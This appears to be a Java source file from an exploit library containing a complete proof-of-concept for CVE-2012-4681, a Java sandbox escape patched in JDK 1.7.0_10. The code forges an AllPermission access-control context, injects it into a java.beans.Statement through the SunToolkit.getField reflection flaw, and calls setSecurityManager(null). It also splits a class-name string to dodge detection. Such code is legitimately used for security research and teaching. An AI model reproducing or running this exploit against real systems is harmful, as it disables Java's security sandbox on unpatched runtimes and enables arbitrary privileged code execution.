
/**
* Copyright (c) 2013-2014
*
* All rights reserved.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*
* The Java-Exploit-Library is licensed under the Creative Commons
* Attribution-ShareAlike 4.0 International License.
*
* Please see the provided LICENSE.txt for a full copy of the agreement.
*/

package cve20124681;

import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.MalformedURLException;
import java.net.URL;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;

/*
* This vulnerability was fixed in JDK 1.7.0_10, using two changes, either one of which
* would also have prevented the vulnerability alone.
* 1.) com.sun.beans.finder.ClassFinder.findClass now includes a call to checkPackageAccess
* 2.) The method sun.awt.SunToolkit.getField was removed.
*
* http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4681
*/
/**
 * Proof-of-concept for CVE-2012-4681: a sandbox escape that clears the installed
 * {@link SecurityManager} from inside a security-managed JVM.
 *
 * <p>Mechanism as visible in this file: a {@link java.beans.Statement} that targets
 * {@code System.setSecurityManager(null)} is built, its private {@code acc} field
 * is overwritten with an {@link AccessControlContext} granting {@link AllPermission},
 * and the statement is then executed under that forged context. The private field is
 * reached through {@code sun.awt.SunToolkit.getField}, and that class is itself loaded
 * through a {@link java.beans.Expression} rather than a direct reference.
 *
 * <p>Per the header comment, both links in this chain were closed in JDK 1.7.0_10
 * (package-access check in {@code com.sun.beans.finder.ClassFinder.findClass}, and
 * removal of {@code SunToolkit.getField}); on a patched runtime the
 * {@link #disableSecurity()} call is expected to fail rather than succeed.
 * The only effective mitigation is running a fixed JDK; the {@code SecurityManager}
 * installed in {@link #main(String[])} is the control being bypassed, not a defence.
 */
public class CVE_2012_4681 {

  /**
   * Demonstrates the bypass: installs a {@link SecurityManager}, prints it, runs the
   * bypass, and prints it again. If the bypass succeeds the second line reports
   * {@code null} (the statement's argument array holds a single {@code null}).
   *
   * @param args ignored
   * @throws Throwable anything raised by the reflective calls below, including the
   *     security exceptions a patched JDK is expected to throw
   */
  public static void main(String[] args) throws Throwable {
    System.setSecurityManager(new SecurityManager());
    System.out.println("SecurityManager: " + System.getSecurityManager());

    disableSecurity();
    System.out.println("SecurityManager: " + System.getSecurityManager());
  }

  /**
   * Executes {@code System.setSecurityManager(null)} under a forged access-control
   * context so the normal {@code setSecurityManager} permission check passes.
   *
   * @throws Throwable propagated from the reflective field access or from
   *     {@link Statement#execute()}
   */
  private static void disableSecurity() throws Throwable {
    // new Object[1] is an argument array containing one null -> setSecurityManager(null).
    Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
    overrideStatementAccessControlContext(localStatement);
    localStatement.execute();
  }

  /**
   * Replaces the private {@code acc} field of {@code statement} with a context that
   * grants {@link AllPermission}, so the statement no longer executes under the
   * caller's restricted context.
   *
   * @param statement the statement whose captured context is overwritten
   * @throws Throwable propagated from {@link #getPrivateField(Class, String)} or
   *     {@link Field#set(Object, Object)}
   */
  private static void overrideStatementAccessControlContext(Statement statement) throws Throwable {
    AccessControlContext acc = createDummyAccessControlContext();
    getPrivateField(Statement.class, "acc").set(statement, acc);
  }

  /**
   * Builds an {@link AccessControlContext} whose single {@link ProtectionDomain}
   * carries a {@code file:///} code source with no signer certificates and a
   * permission set containing {@link AllPermission}.
   *
   * @return a context under which every permission check succeeds
   * @throws MalformedURLException never in practice for the fixed {@code file:///} URL,
   *     but declared by the {@link URL} constructor
   */
  private static AccessControlContext createDummyAccessControlContext() throws MalformedURLException {
    Permissions permissions = new Permissions();
    permissions.add(new AllPermission());
    ProtectionDomain protectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), permissions);
    return new AccessControlContext(new ProtectionDomain[] { protectionDomain });
  }

  /**
   * Obtains a private {@link Field} via {@code sun.awt.SunToolkit.getField}, invoked
   * through a {@link Expression} rather than directly. This is the second of the two
   * vectors named in the header comment (the method was removed in 1.7.0_10).
   *
   * @param clazz the declaring class
   * @param fieldName the name of the private field
   * @return the field; presumably already made accessible by {@code getField}, since the
   *     caller calls {@link Field#set} without {@code setAccessible} — TODO confirm
   * @throws Throwable propagated from class loading or {@link Expression#execute()}
   */
  private static Field getPrivateField(Class<?> clazz, String fieldName) throws Throwable {
    Expression localExpression = new Expression(loadSunToolkit(), "getField", new Object[] { clazz, fieldName });
    localExpression.execute();
    return (Field) localExpression.getValue();
  }

  /**
   * Loads {@code sun.awt.SunToolkit} via {@code Class.forName} wrapped in a
   * {@link Expression}. The class name is assembled from two halves; the variable
   * name indicates this is meant to keep the literal string out of the constant pool,
   * so detection that relies on that literal alone would miss this sample. The
   * package-access check added to {@code ClassFinder.findClass} (see header comment)
   * is what closes this vector on a patched JDK.
   *
   * @return the loaded {@code SunToolkit} class object
   * @throws Throwable propagated from {@link Expression#execute()}, e.g. a
   *     {@code SecurityException} on a fixed runtime
   */
  private static Class<?> loadSunToolkit() throws Throwable {
    String a = "sun.";
    String b = "awt.SunToolkit";
    String obfuscatedClassName = a + b;

    Expression localExpression = new Expression(Class.class, "forName", new Object[] { obfuscatedClassName });
    localExpression.execute();
    return (Class<?>) localExpression.getValue();
  }
}